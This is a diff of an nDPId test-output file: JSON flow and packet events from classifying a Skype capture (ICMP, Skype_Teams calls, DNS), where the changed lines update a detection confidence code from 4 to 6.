00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1431970685839,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970685839,"pkt":"PBXCt3IO0NQSxnP1CABFwABElr0AAEABX8jAqAEBwKgBIgMDgJYAAAAARQAAKO0OAABAEQpDwKgBIsCoAQHmrBTnABQM8wABAAAy3TLdAAAOEA=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.991447} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.991447} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685852,"flow_last_seen":1431970685852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970685852,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1431970685852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970685852,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXIlAAEAG5ijAqAEiW77afchUMD4lFgKCAAAAALAC\/\/+SwgAAAgQFtAEDAwUBAQgKPjJN1wAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1431970685921,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970685921,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0NCRAAPQGWplbvtp9wKgBIjA+yFR61rIKJRYCg4ASH\/4KBwAAAgQFoAEDAwQBAQQC"} @@ -806,16 +806,16 @@ 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1431970686906,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686906,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoj59AAEAGsyrAqAEiW77afchWAbv9gi8CpBfd4VAQIAAfPgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1431970687261,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687261,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuS7AAAEAREzPAqAEirjGr4DLdfQsAGuTOfB8CfeyODsgiOuU1SIeok9yn"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1431970687262,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687262,"pkt":"0NQSxnP1PBXCt3IOCABFAAAurJcAAEARrJHAqAEiUx8MrTLdXYMAGpfYfCECZ7K5p+bX8n+OJOOTrcyv"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1431970687262,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687262,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuSakAAEAREGnAqAEivYqhWDLdTEEAGhcdfCMC1zNoLOVTJhFFmEsFrmck"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1431970687262,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687262,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuOf4AAEAROozAqAEivbyGrjLdV6QAGoKkfCUCWKDpreHeWqMtL4LNh6CD"} -00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjTxAAEAG\/gPAqAEiTKehBshYTzLHdCWnAAAAALAC\/\/\/vzwAAAgQFtAEDAwUBAQgKPjJU3AAAAAAEAgAA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -830,10 +830,10 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1431970687953,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687953,"pkt":"0NQSxnP1PBXCt3IOCABFAAA06CNAAEAGoyjAqAEiTKehBshYTzLHdCWoEv4emIAQECx16wAAAQEICj4yVfS+r7gZ"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1431970688025,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970688025,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuOK8AAEARxlrAqAEib91KDjLdAbsAGqZSfFUC4vleo7UvMvPmsU4YCKBd"} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1431970688320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970688320,"pkt":"0NQSxnP1PBXCt3IOCABFAAAukPgAAEARnzfAqAEinTfrjTLdAbsAGuidfHYCyiJR+IygHiSHdyp3P0rG"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688560,"flow_last_seen":1431970688560,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970688560,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1431970688560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970688560,"pkt":"0NQSxnP1PBXCt3IOCABFAABALZlAAEAGrHTAqAEiUVNNjchbROcBp2a0AAAAALAC\/\/\/KOQAAAgQFtAEDAwUBAQgKPjJYSAAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1431970688626,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970688626,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8CBlAAHQGnfhRU02NwKgBIkTnyFsYw7jOAadmtaASIADTOAAAAgQFrAEDAwgEAggKALwVrD4yWEg="} @@ -852,14 +852,14 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1431970689742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970689742,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ToBAAEAGi5nAqAEiUVNNjcheROdnq4JWnrqPT4AQECwuuQAAAQEICj4yXNIAvBYb"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1431970690133,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970690133,"pkt":"0NQSxnP1PBXCt3IOCABFAABEeJ0AAEARfpjAqAEiwKgBAemMADUAMK9udVgBAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1431970690190,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431970690190,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA16YwAQDU7dViBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAsABBfOIaY="} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970690190,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 